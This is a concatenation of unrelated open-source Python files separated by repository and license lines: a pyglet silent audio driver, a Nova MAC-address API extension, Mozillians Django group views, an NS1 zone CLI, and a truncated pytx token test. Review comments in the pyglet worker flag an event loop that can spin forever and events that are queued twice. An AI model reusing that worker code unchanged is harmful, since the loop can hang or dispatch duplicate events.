__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
from pyglet.media import AbstractAudioPlayer, AbstractAudioDriver, \
MediaThread, MediaEvent
import pyglet
_debug = pyglet.options['debug_media']
class SilentAudioPacket(object):
    """A span of simulated (silent) audio.

    Tracks the source timestamp at the start of the unplayed portion and
    how many seconds of the span remain.
    """

    def __init__(self, timestamp, duration):
        # Timestamp (seconds) of the first sample still buffered.
        self.timestamp = timestamp
        # Seconds of audio remaining in this packet.
        self.duration = duration

    def consume(self, dt):
        """Advance ``dt`` seconds into the packet, shrinking what is left."""
        self.timestamp = self.timestamp + dt
        self.duration = self.duration - dt
class SilentAudioPlayerPacketConsumer(AbstractAudioPlayer):
    """Silent audio player that consumes source packets in "real time".

    A worker thread pretends to buffer and play audio, advancing timestamps
    against the system clock and dispatching media events (e.g. EOS) that
    would normally be carried inside the audio stream.  All mutable state
    shared with the worker is guarded by ``self._thread.condition``.
    """
    # When playing video, length of audio (in secs) to buffer ahead.
    _buffer_time = 0.4
    # Minimum number of bytes to request from source
    _min_update_bytes = 1024
    # Maximum sleep time
    _sleep_time = 0.2
    def __init__(self, source_group, player):
        super(SilentAudioPlayerPacketConsumer, self).__init__(source_group, player)
        # System time of first timestamp
        self._timestamp_time = None
        # List of buffered SilentAudioPacket
        self._packets = []
        self._packets_duration = 0
        self._events = []
        # Actual play state.
        self._playing = False
        # TODO Be nice to avoid creating this thread if user doesn't care
        # about EOS events and there's no video format.
        # NOTE Use thread.condition as lock for all instance vars used by worker
        self._thread = MediaThread(target=self._worker_func)
        if source_group.audio_format:
            self._thread.start()
    def delete(self):
        if _debug:
            print 'SilentAudioPlayer.delete'
        self._thread.stop()
    def play(self):
        if _debug:
            print 'SilentAudioPlayer.play'
        self._thread.condition.acquire()
        if not self._playing:
            self._playing = True
            # Anchor the wall clock so get_time() can compute elapsed audio.
            self._timestamp_time = time.time()
            self._thread.condition.notify()
        self._thread.condition.release()
    def stop(self):
        if _debug:
            print 'SilentAudioPlayer.stop'
        self._thread.condition.acquire()
        if self._playing:
            timestamp = self.get_time()
            if self._packets:
                # Consume the head packet up to the pause position so that
                # resuming continues from the right place.
                packet = self._packets[0]
                self._packets_duration -= timestamp - packet.timestamp
                packet.consume(timestamp - packet.timestamp)
            self._playing = False
        self._thread.condition.release()
    def clear(self):
        if _debug:
            print 'SilentAudioPlayer.clear'
        self._thread.condition.acquire()
        del self._packets[:]
        self._packets_duration = 0
        del self._events[:]
        self._thread.condition.release()
    def get_time(self):
        """Return the current source timestamp, or None if unknown."""
        if _debug:
            print 'SilentAudioPlayer.get_time()'
        self._thread.condition.acquire()
        packets = self._packets
        if self._playing:
            # Consume timestamps
            result = None
            offset = time.time() - self._timestamp_time
            while packets:
                packet = packets[0]
                if offset > packet.duration:
                    # Whole packet already "played": drop it and keep going.
                    del packets[0]
                    self._timestamp_time += packet.duration
                    offset -= packet.duration
                    self._packets_duration -= packet.duration
                else:
                    packet.consume(offset)
                    self._packets_duration -= offset
                    self._timestamp_time += offset
                    result = packet.timestamp
                    break
        else:
            # Paused
            if packets:
                result = packets[0].timestamp
            else:
                result = None
        self._thread.condition.release()
        if _debug:
            print 'SilentAudioPlayer.get_time() -> ', result
        return result
    # Worker func that consumes audio data and dispatches events
    def _worker_func(self):
        thread = self._thread
        #buffered_time = 0
        eos = False
        events = self._events
        while True:
            thread.condition.acquire()
            if thread.stopped or (eos and not events):
                thread.condition.release()
                break
            # Use up "buffered" audio based on amount of time passed.
            timestamp = self.get_time()
            if _debug:
                print 'timestamp: %r' % timestamp
            # Dispatch events
            # NOTE(review): if the head event is not yet due, this loop has
            # no exit path (no break in the false case) -- verify against
            # upstream pyglet whether this can spin forever.
            while events and timestamp is not None:
                if (events[0].timestamp is None or
                    events[0].timestamp <= timestamp):
                    events[0]._sync_dispatch_to_player(self.player)
                    del events[0]
            # Calculate how much data to request from source
            secs = self._buffer_time - self._packets_duration
            bytes = secs * self.source_group.audio_format.bytes_per_second
            if _debug:
                print 'Trying to buffer %d bytes (%r secs)' % (bytes, secs)
            while bytes > self._min_update_bytes and not eos:
                # Pull audio data from source
                audio_data = self.source_group.get_audio_data(int(bytes))
                if not audio_data and not eos:
                    # Source exhausted: queue EOS notifications.
                    events.append(MediaEvent(timestamp, 'on_eos'))
                    events.append(MediaEvent(timestamp, 'on_source_group_eos'))
                    eos = True
                    break
                # Pretend to buffer audio data, collect events.
                if self._playing and not self._packets:
                    self._timestamp_time = time.time()
                self._packets.append(SilentAudioPacket(audio_data.timestamp,
                                                       audio_data.duration))
                self._packets_duration += audio_data.duration
                # NOTE(review): events are added once per-item in this loop
                # and then again via extend() below -- looks like each event
                # is queued twice; confirm intended behavior.
                for event in audio_data.events:
                    event.timestamp += audio_data.timestamp
                    events.append(event)
                events.extend(audio_data.events)
                bytes -= audio_data.length
            # Sleep until the next event is due (or indefinitely if paused).
            sleep_time = self._sleep_time
            if not self._playing:
                sleep_time = None
            elif events and events[0].timestamp and timestamp:
                sleep_time = min(sleep_time, events[0].timestamp - timestamp)
            if _debug:
                print 'SilentAudioPlayer(Worker).sleep', sleep_time
            thread.sleep(sleep_time)
            thread.condition.release()
class SilentTimeAudioPlayer(AbstractAudioPlayer):
    """Audio player that merely tracks wall-clock playback time.

    Note that when using this player (automatic if playing back video with
    an unsupported audio codec) no events are dispatched, because they are
    normally encoded in the audio packets -- so no EOS events are delivered.
    This is a design flaw.  Seeking is also broken, because the timestamps
    are not synchronized with the source group.
    """

    # Accumulated playback time (seconds) while stopped.
    _time = 0.0
    # Wall-clock time at which play() was called, or None while stopped.
    _systime = None

    def play(self):
        self._systime = time.time()

    def stop(self):
        self._time = self.get_time()
        self._systime = None

    def delete(self):
        pass

    def clear(self):
        pass

    def get_time(self):
        if self._systime is None:
            # Not playing: report the frozen time.
            return self._time
        # Playing: frozen time plus wall-clock elapsed since play().
        return time.time() - self._systime + self._time
class SilentAudioDriver(AbstractAudioDriver):
    """Driver factory producing silent audio players."""

    def create_audio_player(self, source_group, player):
        # Sources without an audio format only need a wall-clock timer;
        # sources with audio get the packet-consuming player so timestamps
        # and events stay in step with the (pretend) playback.
        if not source_group.audio_format:
            return SilentTimeAudioPlayer(source_group, player)
        return SilentAudioPlayerPacketConsumer(source_group, player)
def create_audio_driver():
    """Entry point used by pyglet.media to instantiate this driver."""
    return SilentAudioDriver()
| bsd-3-clause |
watonyweng/nova | nova/api/openstack/compute/legacy_v2/contrib/extended_ips_mac.py | 79 | 3077 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Extended Ips API extension."""
import itertools
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
authorize = extensions.soft_extension_authorizer('compute', 'extended_ips_mac')
class ExtendedIpsMacController(wsgi.Controller):
    """Controller extension adding '<alias>:mac_addr' to server addresses.

    Hooks the servers 'show' and 'detail' responses and annotates every
    listed IP entry with the MAC address of its port.

    Note: the redundant ``__init__`` that only delegated to ``super`` has
    been removed; inheritance provides identical behavior.
    """

    def _extend_server(self, context, server, instance):
        """Annotate each visible address of ``server`` with its MAC address.

        :param context: request context used for the network lookup
        :param server: API server dict (mutated in place)
        :param instance: DB instance the server dict was built from
        """
        key = "%s:mac_addr" % Extended_ips_mac.alias
        networks = common.get_networks_for_instance(context, instance)
        for label, network in networks.items():
            # NOTE(vish): ips are hidden in some states via the
            # hide_server_addresses extension.
            if label in server['addresses']:
                all_ips = itertools.chain(network["ips"],
                                          network["floating_ips"])
                for i, ip in enumerate(all_ips):
                    server['addresses'][label][i][key] = ip['mac_address']

    @wsgi.extends
    def show(self, req, resp_obj, id):
        """Extend a single-server 'show' response with MAC addresses."""
        context = req.environ['nova.context']
        if authorize(context):
            server = resp_obj.obj['server']
            db_instance = req.get_db_instance(server['id'])
            # server['id'] is guaranteed to be in the cache due to
            # the core API adding it in its 'show' method.
            self._extend_server(context, server, db_instance)

    @wsgi.extends
    def detail(self, req, resp_obj):
        """Extend a server-list 'detail' response with MAC addresses."""
        context = req.environ['nova.context']
        if authorize(context):
            servers = list(resp_obj.obj['servers'])
            for server in servers:
                db_instance = req.get_db_instance(server['id'])
                # server['id'] is guaranteed to be in the cache due to
                # the core API adding it in its 'detail' method.
                self._extend_server(context, server, db_instance)
class Extended_ips_mac(extensions.ExtensionDescriptor):
    """Adds mac address parameter to the ip list."""
    # NOTE(review): the docstring above is presumably surfaced as the
    # extension description in the API -- keep it user-facing; confirm
    # against ExtensionDescriptor before rewording.
    name = "ExtendedIpsMac"
    alias = "OS-EXT-IPS-MAC"
    namespace = ("http://docs.openstack.org/compute/ext/"
                 "extended_ips_mac/api/v1.1")
    updated = "2013-03-07T00:00:00Z"
    def get_controller_extensions(self):
        # Attach ExtendedIpsMacController to the 'servers' resource.
        controller = ExtendedIpsMacController()
        extension = extensions.ControllerExtension(self, 'servers', controller)
        return [extension]
| apache-2.0 |
brian-yang/mozillians | mozillians/groups/views.py | 2 | 15815 | import json
from collections import defaultdict
from django.conf import settings
from django.contrib import messages
from django.core.paginator import EmptyPage, Paginator, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseBadRequest, Http404
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.cache import cache_control, never_cache
from django.views.decorators.http import require_POST
from funfactory.urlresolvers import reverse
from mozillians.users.models import UserProfile
from tower import ugettext as _
from mozillians.common.decorators import allow_unvouched
from mozillians.common.helpers import get_object_or_none
from mozillians.groups.forms import (GroupForm, TermsReviewForm,
MembershipFilterForm, SortForm,
SuperuserGroupForm)
from mozillians.groups.models import Group, Skill, GroupMembership
def _list_groups(request, template, query):
    """Render ``template`` with a sorted, paginated page of ``query``.

    Shared helper behind the group/skill/area index views.
    """
    sort_form = SortForm(request.GET)
    show_pagination = False
    if sort_form.is_valid():
        query = query.order_by(sort_form.cleaned_data['sort'], 'name')
    else:
        # Invalid or absent sort parameter: fall back to alphabetical order.
        query = query.order_by('name')
    paginator = Paginator(query, settings.ITEMS_PER_PAGE)
    page = request.GET.get('page', 1)
    try:
        groups = paginator.page(page)
    except PageNotAnInteger:
        groups = paginator.page(1)
    except EmptyPage:
        # Page number beyond the last page: clamp to the final page.
        groups = paginator.page(paginator.num_pages)
    if paginator.count > settings.ITEMS_PER_PAGE:
        show_pagination = True
    data = dict(groups=groups, page=page, sort_form=sort_form, show_pagination=show_pagination)
    return render(request, template, data)
def index_groups(request):
    """Render the listing of all public groups in use on Mozillians.

    Functional areas, invisible groups, and groups with no vouched
    members are excluded.
    """
    groups_query = Group.get_non_functional_areas()
    return _list_groups(request, 'groups/index_groups.html', groups_query)
def index_skills(request):
    """Render the listing of all public skills in use on Mozillians."""
    skills_query = Skill.objects.filter(members__is_vouched=True)
    return _list_groups(request, 'groups/index_skills.html', skills_query)
def index_functional_areas(request):
    """Render the listing of all functional areas."""
    areas_query = Group.get_functional_areas()
    return _list_groups(request, 'groups/index_areas.html', areas_query)
@allow_unvouched
@cache_control(must_revalidate=True, max_age=3600)
def search(request, searched_object=Group):
    """Simple wildcard search for a group using a GET parameter.
    Used for group/skill auto-completion.

    :param searched_object: model class providing a ``search`` classmethod;
        defaults to Group, URLconf may pass Skill instead.
    """
    term = request.GET.get('term', None)
    if request.is_ajax() and term:
        groups = searched_object.search(term).values_list('name', flat=True)
        return HttpResponse(json.dumps(list(groups)),
                            content_type='application/json')
    # Reject non-AJAX requests and requests without a search term.
    return HttpResponseBadRequest()
@never_cache
def show(request, url, alias_model, template):
    """List all members in this group.

    Handles both Group and Skill aliases: redirects legacy alias URLs to
    the canonical one, enforces pending-terms review, and gives curators
    a filterable member/pending-member listing.
    """
    group_alias = get_object_or_404(alias_model, url=url)
    if group_alias.alias.url != url:
        # Old alias URL: redirect to the canonical group URL.
        return redirect('groups:show_group', url=group_alias.alias.url)
    is_curator = False
    is_manager = request.user.userprofile.is_manager
    is_pending = False
    show_delete_group_button = False
    membership_filter_form = MembershipFilterForm(request.GET)
    group = group_alias.alias
    profile = request.user.userprofile
    in_group = group.has_member(profile)
    memberships = group.members.all()
    data = {}
    if isinstance(group, Group):
        # Has the user accepted the group terms
        if group.terms:
            membership = get_object_or_none(GroupMembership, group=group, userprofile=profile,
                                            status=GroupMembership.PENDING_TERMS)
            if membership:
                # Force the user to review the terms before seeing the group.
                return redirect(reverse('groups:review_terms', args=[group.url]))
        # Is this user's membership pending?
        is_pending = group.has_pending_member(profile)
        is_curator = is_manager or (request.user.userprofile in group.curators.all())
        # initialize the form only when the group is moderated and user is curator of the group
        if is_curator and group.accepting_new_members == 'by_request':
            membership_filter_form = MembershipFilterForm(request.GET)
        else:
            membership_filter_form = None
        if is_curator:
            # Curators see full members and pending requests, optionally
            # narrowed by the filter form.
            statuses = [GroupMembership.MEMBER, GroupMembership.PENDING]
            if membership_filter_form and membership_filter_form.is_valid():
                filtr = membership_filter_form.cleaned_data['filtr']
                if filtr == 'members':
                    statuses = [GroupMembership.MEMBER]
                elif filtr == 'pending_members':
                    statuses = [GroupMembership.PENDING]
            memberships = group.groupmembership_set.filter(status__in=statuses)
            # Curators can delete their group if there are no other members.
            show_delete_group_button = is_curator and group.members.all().count() == 1
        else:
            # only show full members, or this user
            memberships = group.groupmembership_set.filter(
                Q(status=GroupMembership.MEMBER) | Q(userprofile=profile))
        # Order by UserProfile.Meta.ordering
        memberships = memberships.order_by('userprofile')
        # Find the most common skills of the group members.
        # Order by popularity in the group.
        shared_skill_ids = (group.members.filter(groupmembership__status=GroupMembership.MEMBER)
                            .values_list('skills', flat=True))
        count_skills = defaultdict(int)
        for skill_id in shared_skill_ids:
            count_skills[skill_id] += 1
        # Keep only skills shared by at least two members.
        common_skills_ids = [k for k, v in sorted(count_skills.items(),
                                                  key=lambda x: x[1],
                                                  reverse=True)
                             if count_skills[k] > 1]
        # Translate ids to Skills preserving order.
        skills = [Skill.objects.get(id=skill_id) for skill_id in common_skills_ids if skill_id]
        data.update(skills=skills, membership_filter_form=membership_filter_form)
    page = request.GET.get('page', 1)
    paginator = Paginator(memberships, settings.ITEMS_PER_PAGE)
    try:
        people = paginator.page(page)
    except PageNotAnInteger:
        people = paginator.page(1)
    except EmptyPage:
        # Out-of-range page: clamp to the last page.
        people = paginator.page(paginator.num_pages)
    show_pagination = paginator.count > settings.ITEMS_PER_PAGE
    extra_data = dict(people=people,
                      group=group,
                      in_group=in_group,
                      is_curator=is_curator,
                      is_pending=is_pending,
                      show_pagination=show_pagination,
                      show_delete_group_button=show_delete_group_button,
                      show_join_button=group.user_can_join(request.user.userprofile),
                      show_leave_button=group.user_can_leave(request.user.userprofile),
                      members=group.member_count,
                      )
    data.update(extra_data)
    return render(request, template, data)
def remove_member(request, url, user_pk):
    """Remove a member from a group (GET shows a confirmation page).

    Members may remove themselves when the group allows it; curators and
    managers may remove anyone except the group's last curator.
    """
    group = get_object_or_404(Group, url=url)
    profile_to_remove = get_object_or_404(UserProfile, pk=user_pk)
    this_userprofile = request.user.userprofile
    is_curator = (this_userprofile in group.curators.all())
    is_manager = request.user.userprofile.is_manager
    group_url = reverse('groups:show_group', args=[group.url])
    next_url = request.REQUEST.get('next_url', group_url)
    # TODO: this duplicates some of the logic in Group.user_can_leave(), but we
    # want to give the user a message that's specific to the reason they can't leave.
    # Can we make this DRYer?
    # You can remove yourself, if group allows it. Curator and superuser can remove anyone.
    if not (is_curator or is_manager):
        if not group.members_can_leave:
            messages.error(request, _('This group does not allow members to remove themselves.'))
            return redirect(next_url)
        if profile_to_remove != this_userprofile:
            # Ordinary members may only remove themselves.
            raise Http404()
    # Curators cannot be removed, only by themselves and if there is another curator.
    curators = group.curators.all()
    if (profile_to_remove in curators and curators.count() <= 1 and
        profile_to_remove != this_userprofile):
        messages.error(request, _('The group needs at least one curator.'))
        return redirect(next_url)
    if request.method == 'POST':
        # No notification email when a user removes themselves.
        group.remove_member(profile_to_remove,
                            send_email=(profile_to_remove != this_userprofile))
        if profile_to_remove in curators:
            group.curators.remove(profile_to_remove)
        if this_userprofile == profile_to_remove:
            messages.info(request, _('You have been removed from this group.'))
        else:
            messages.info(request, _('The group member has been removed.'))
        return redirect(next_url)
    # Display confirmation page
    context = {
        'group': group,
        'profile': profile_to_remove,
        'next_url': next_url
    }
    return render(request, 'groups/confirm_remove_member.html', context)
@require_POST
def confirm_member(request, url, user_pk):
    """
    Add a member to a group who has requested membership.
    """
    group = get_object_or_404(Group, url=url)
    profile = get_object_or_404(UserProfile, pk=user_pk)
    is_curator = (request.user.userprofile in group.curators.all())
    is_manager = request.user.userprofile.is_manager
    group_url = reverse('groups:show_group', args=[group.url])
    next_url = request.REQUEST.get('next_url', group_url)
    # Only curators and managers may approve membership requests.
    if not (is_curator or is_manager):
        raise Http404()
    try:
        membership = GroupMembership.objects.get(group=group, userprofile=profile)
    except GroupMembership.DoesNotExist:
        messages.error(request, _('This user has not requested membership in this group.'))
    else:
        if membership.status == GroupMembership.MEMBER:
            messages.error(request, _('This user is already a member of this group.'))
        else:
            # Groups with terms require the user to accept them before
            # becoming a full member.
            status = GroupMembership.MEMBER
            if group.terms:
                status = GroupMembership.PENDING_TERMS
            group.add_member(profile, status=status)
            messages.info(request, _('This user has been added as a member of this group.'))
    return redirect(next_url)
def edit(request, url, alias_model, template):
    """Render the edit page for a group/skill.

    BUG FIX: ``render`` expects (request, template_name, context); the
    original call was ``render(request, alias_model, template)``, passing
    the model class where the template name belongs, which could never
    render successfully.  The template argument is now used as the
    template name.
    """
    # NOTE(review): url and alias_model are currently unused -- presumably
    # this view should look up the object being edited (cf. show());
    # confirm intended behavior against the URLconf before extending.
    return render(request, template)
def review_terms(request, url):
    """Review group terms page.

    Shown to users whose membership is pending acceptance of the group's
    terms; accepting promotes them to full member, declining deletes the
    pending membership.
    """
    group = get_object_or_404(Group, url=url)
    if not group.terms:
        # Nothing to review: groups without terms go straight to the page.
        return redirect(reverse('groups:show_group', args=[group.url]))
    membership = get_object_or_404(GroupMembership, group=group,
                                   userprofile=request.user.userprofile,
                                   status=GroupMembership.PENDING_TERMS)
    membership_form = TermsReviewForm(request.POST or None)
    if membership_form.is_valid():
        if membership_form.cleaned_data['terms_accepted'] == 'True':
            group.add_member(request.user.userprofile, GroupMembership.MEMBER)
        else:
            # Terms declined: drop the pending membership entirely.
            membership.delete()
        return redirect(reverse('groups:show_group', args=[group.url]))
    ctx = {
        'group': group,
        'membership_form': membership_form
    }
    return render(request, 'groups/terms.html', ctx)
@require_POST
def join_group(request, url):
    """User request to join group.

    Depending on the group's policy the user becomes a member immediately,
    must first accept the group terms, or is queued for curator approval.
    """
    group = get_object_or_404(Group, url=url)
    profile_to_add = request.user.userprofile
    # TODO: this duplicates some of the logic in Group.user_can_join(), but we
    # want to give the user a message that's specific to the reason they can't join.
    # Can we make this DRYer?
    if group.has_member(profile_to_add):
        messages.error(request, _('You are already in this group.'))
    elif group.has_pending_member(profile_to_add):
        messages.error(request, _('Your request to join this group is still pending.'))
    elif group.accepting_new_members == 'no':
        messages.error(request, _('This group is not accepting requests to join.'))
    else:
        if group.accepting_new_members == 'yes':
            status = GroupMembership.MEMBER
            messages.info(request, _('You have been added to this group.'))
            # Groups with terms still gate full membership on acceptance.
            if group.terms:
                status = GroupMembership.PENDING_TERMS
        elif group.accepting_new_members == 'by_request':
            status = GroupMembership.PENDING
            messages.info(request, _('Your membership request has been sent '
                                     'to the group curator(s).'))
        group.add_member(profile_to_add, status=status)
    return redirect(reverse('groups:show_group', args=[group.url]))
@require_POST
def toggle_skill_subscription(request, url):
    """Add the skill to the current user's profile, or remove it if present."""
    user_profile = request.user.userprofile
    skill = get_object_or_404(Skill, url=url)
    already_subscribed = user_profile.skills.filter(id=skill.id).exists()
    if already_subscribed:
        user_profile.skills.remove(skill)
    else:
        user_profile.skills.add(skill)
    return redirect(reverse('groups:show_skill', args=[skill.url]))
@require_POST
def group_delete(request, url):
    """Delete a group; only allowed for its curator (or a manager) and
    only while the curator is the sole member."""
    profile = request.user.userprofile
    # Get the group to delete
    group = get_object_or_404(Group, url=url)
    # Only a group curator is allowed to delete a group
    is_curator = profile in group.curators.all()
    if not is_curator and not profile.is_manager:
        messages.error(request, _('You must be a curator to delete a group'))
        return redirect(reverse('groups:show_group', args=[group.url]))
    # Cannot delete if anyone else is in it
    if group.members.all().count() != 1:
        messages.error(request, _('You cannot delete a group if anyone else is in it.'))
        return redirect(reverse('groups:show_group', args=[group.url]))
    # Go to it
    group.delete()
    messages.info(request, _('Group %s has been deleted') % group.name)
    return redirect(reverse('groups:index_groups'))
@never_cache
def group_add_edit(request, url=None):
    """
    Add or edit a group. (If a url is passed in, we're editing.)
    """
    profile = request.user.userprofile
    is_manager = request.user.userprofile.is_manager
    if url:
        # Get the group to edit
        group = get_object_or_404(Group, url=url)
        # Only a group curator or an admin is allowed to edit a group
        is_curator = profile in group.curators.all()
        if not (is_curator or is_manager):
            messages.error(request, _('You must be a curator or an admin to edit a group'))
            return redirect(reverse('groups:show_group', args=[group.url]))
    else:
        group = Group()
    # Managers get the unrestricted form.
    form_class = SuperuserGroupForm if is_manager else GroupForm
    # Pre-select the current user plus (when editing) the existing curators.
    curators_ids = [profile.id]
    if url:
        curators_ids += group.curators.all().values_list('id', flat=True)
    form = form_class(request.POST or None, instance=group,
                      initial={'curators': curators_ids})
    if form.is_valid():
        group = form.save()
        return redirect(reverse('groups:show_group', args=[group.url]))
    context = {
        'form': form,
        'creating': url is None,
        'group': group if url else None
    }
    return render(request, 'groups/add_edit.html', context)
| bsd-3-clause |
ns1/nsone-cli | ns1cli/commands/cmd_zone.py | 3 | 7144 | import click
from ns1cli.cli import cli, write_options
from ns1cli.util import Formatter
from nsone.rest.resource import ResourceException
class ZoneFormatter(Formatter):
    """Formatter for zone SOA data plus a summary of the zone's records."""
    def print_zone(self, zdata):
        # Records are listed separately from the remaining SOA fields.
        records = zdata.pop('records')
        self.pretty_print(zdata)
        if len(records) == 0:
            click.secho('NO RECORDS', bold=True)
            return
        click.secho('RECORDS:', bold=True)
        # Pad domains to the longest one so the columns line up.
        longestRec = self._longest([r['domain'] for r in records])
        for r in records:
            self.out(' %s %s %s' % (r['domain'].ljust(longestRec),
                                    r['type'].ljust(5),
                                    ', '.join(r['short_answers'])))
@click.group('zone',
             short_help='View and modify zone soa data')
@click.pass_context
def cli(ctx):
    """Create, retrieve, update, and delete zone SOA data"""
    # Shared state for the zone subcommands: an output formatter and the
    # REST zones endpoint.
    ctx.obj.formatter = ZoneFormatter(ctx.obj.get_config('output_format'))
    ctx.obj.zone_api = ctx.obj.rest.zones()
@cli.command('list', short_help='List all active zones')
@click.pass_context
def list(ctx):
    """Returns all active zones and basic zone configuration details
    for each.
    \b
    EXAMPLES:
        zone list
    """
    # NOTE: shadows the builtin `list`; acceptable here since click
    # registers the function as a subcommand and it is never called directly.
    try:
        zlist = ctx.obj.zone_api.list()
    except ResourceException as e:
        # Surface REST errors as click errors (e.message is py2-era API).
        raise click.ClickException('REST API: %s' % e.message)
    else:
        if ctx.obj.formatter.output_format == 'json':
            ctx.obj.formatter.out_json(zlist)
            return
        click.secho('ZONES:', bold=True)
        for z in zlist:
            ctx.obj.formatter.out(' ' + z['zone'])
@cli.command('info', short_help='Get zone details')
@click.argument('zone')
@click.pass_context
def info(ctx, zone):
    """Returns a single active ZONE and its basic configuration details.
    For convenience, a list of records in the ZONE, and some basic details
    of each record, is also included.
    \b
    EXAMPLES:
    zone info test.com
    """
    try:
        zdata = ctx.obj.zone_api.retrieve(zone)
    except ResourceException as e:
        raise click.ClickException('REST API: %s' % e.message)
    fmt = ctx.obj.formatter
    if fmt.output_format == 'json':
        fmt.out_json(zdata)
    else:
        fmt.print_zone(zdata)
@cli.command('create', short_help='Create a new zone')
@click.argument('zone')
@write_options
@click.option('--link', help='Create linked zone pointing to given zone', type=str)
@click.option('--refresh', help='SOA Refresh', type=int)
@click.option('--retry', help='SOA Retry', type=int)
@click.option('--expiry', help='SOA Expiry', type=int)
@click.option('--nx_ttl', help='SOA NX TTL', type=int)
@click.pass_context
def create(ctx, nx_ttl, expiry, retry, refresh, link, zone):
    """Creates a new DNS ZONE. You must include at minimum the ZONE domain name.
    \b
    ZONE TYPES:
    1) standard zone (which has its own configuration and records)
    2) linked zone (which points to an existing standard zone, reusing its
    configuration and records)
    \b
    EXAMPLES:
    zone create test.com
    zone create --link test.com linked.com
    zone create --nx_ttl 300 with.option
    zone create --nx_ttl=300 with.option
    \b
    LINKED ZONES:
    For non-linked zones, you may specify optional zone configuration by including
    ttl (SOA record TTL), refresh, retry, expiry, and nx_ttl values, as in a SOA record.
    The zone is assigned DNS servers and appropriate NS records are automatically created,
    unless you create a secondary zone.
    To create a linked ZONE, you must include the --link option. It must be a string which
    references the TARGET zone (domain name) to link to. The TARGET zone must be owned by
    the same account that is creating the linked ZONE. If the link property is specified,
    no other zone configuration properties (such as refresh, retry, etc) may be specified,
    since they are all pulled from the TARGET zone. Linked zones, once created, cannot be
    configured at all and cannot have records added to them. They may only be deleted,
    which does not affect the TARGET zone at all.
    """
    ctx.obj.check_write_lock()
    options = {}
    # BUGFIX: compare against None instead of truthiness — click leaves unset
    # int options as None, so a legitimate explicit 0 (e.g. --nx_ttl 0) was
    # previously dropped silently.
    if nx_ttl is not None:
        options['nx_ttl'] = nx_ttl
    if expiry is not None:
        options['expiry'] = expiry
    if retry is not None:
        options['retry'] = retry
    if refresh is not None:
        options['refresh'] = refresh
    if link:
        # A linked zone inherits all SOA settings from its target, so no
        # other configuration option may accompany --link.
        if options:
            raise click.UsageError('Cannot create linked zone with options besides the link source')
        options['link'] = link
    try:
        zdata = ctx.obj.zone_api.create(zone, **options)
    except ResourceException as e:
        raise click.ClickException('REST API: %s' % e.message)
    else:
        if ctx.obj.formatter.output_format == 'json':
            ctx.obj.formatter.out_json(zdata)
            return
        ctx.obj.formatter.print_zone(zdata)
@cli.command('set', short_help='Update zone attributes')
@click.argument('zone')
@write_options
@click.option('--refresh', help='SOA Refresh', type=int)
@click.option('--retry', help='SOA Retry', type=int)
@click.option('--expiry', help='SOA Expiry', type=int)
@click.option('--nx_ttl', help='SOA NX TTL', type=int)
@click.pass_context
def set(ctx, nx_ttl, expiry, retry, refresh, zone):
    """Modify basic details of a DNS ZONE. Details include ttl (SOA record TTL),
    refresh, retry, expiry, or nx_ttl values, as in a SOA record.
    You may not change the ZONE name or other details.
    \b
    EXAMPLES:
    zone set --nx_ttl 200 --retry 5 test.com
    zone set -f --expiry 100 test.com
    """
    # BUGFIX: @write_options was applied twice (before --refresh and again
    # after --nx_ttl), registering the shared write flags on the command
    # twice; a single application is sufficient. Also fixed the docstring
    # example typo (--nt_ttl -> --nx_ttl).
    ctx.obj.check_write_lock()
    options = {}
    # Compare against None so an explicit 0 (a valid SOA value) is honored.
    if nx_ttl is not None:
        options['nx_ttl'] = nx_ttl
    if expiry is not None:
        options['expiry'] = expiry
    if retry is not None:
        options['retry'] = retry
    if refresh is not None:
        options['refresh'] = refresh
    if not options:
        raise click.UsageError('Updating zone requires at least one option')
    try:
        zdata = ctx.obj.zone_api.update(zone, **options)
    except ResourceException as e:
        raise click.ClickException('REST API: %s' % e.message)
    else:
        if ctx.obj.formatter.output_format == 'json':
            ctx.obj.formatter.out_json(zdata)
            return
        ctx.obj.formatter.print_zone(zdata)
@cli.command('delete',
             short_help='Delete a zone and all records it contains')
@click.argument('zone')
@write_options
@click.pass_context
def delete(ctx, zone):
    """Destroys an existing DNS ZONE and all records in the ZONE.
    NS1 servers won't respond to queries for the zone or any of the records
    after you do this, and you cannot recover the deleted ZONE, so be careful!
    \b
    EXAMPLES:
    zone delete test.com
    zone delete -f test.com
    """
    ctx.obj.check_write_lock()
    try:
        ctx.obj.zone_api.delete(zone)
    except ResourceException as e:
        raise click.ClickException('REST API: %s' % e.message)
    # Only reached on success; the REST error path raises above.
    click.echo('{} deleted'.format(zone))
| mit |
arirubinstein/ThreatExchange | tests/access_token_test.py | 1 | 2660 | from contextlib import nested
from mock import patch
import pytest
from pytx import access_token
from pytx.errors import pytxInitError
from pytx.vocabulary import ThreatExchange as te
class TestInit:
    """Tests for pytx.access_token.init() covering each way credentials can be
    supplied: explicit app id/secret, implicit/explicit token files, and
    environment variables.

    NOTE: the original used contextlib.nested(), which is deprecated and was
    removed in Python 3. The multi-manager ``with a, b:`` statement (available
    since Python 2.7) enters the managers in the same order and is the
    drop-in replacement used throughout.
    """

    def verify_token(self, expected_token):
        # Helper: the token actually stored must match what init() was given.
        assert expected_token == access_token.get_access_token()

    def test_no_token(self):
        # No args, no discoverable token file: init() must fail.
        with pytest.raises(pytxInitError), \
                patch('pytx.access_token._find_token_file', return_value=None):
            access_token.init()

    def test_only_app_id(self):
        # An app id without a secret is not enough to build a token.
        with pytest.raises(pytxInitError), \
                patch('pytx.access_token._find_token_file', return_value=None):
            access_token.init(app_id='app_id')

    def test_only_app_secret(self):
        # A secret without an app id is likewise insufficient.
        with pytest.raises(pytxInitError), \
                patch('pytx.access_token._find_token_file', return_value=None):
            access_token.init(app_secret='app_secret')

    def test_app_id_and_secret(self):
        expected_token = 'app_id|app_secret'
        with patch('pytx.access_token._find_token_file', return_value=None):
            access_token.init(app_id='app_id', app_secret='app_secret')
        self.verify_token(expected_token)

    def test_implicit_token_file(self):
        # Token file is discovered automatically (mocked _find_token_file).
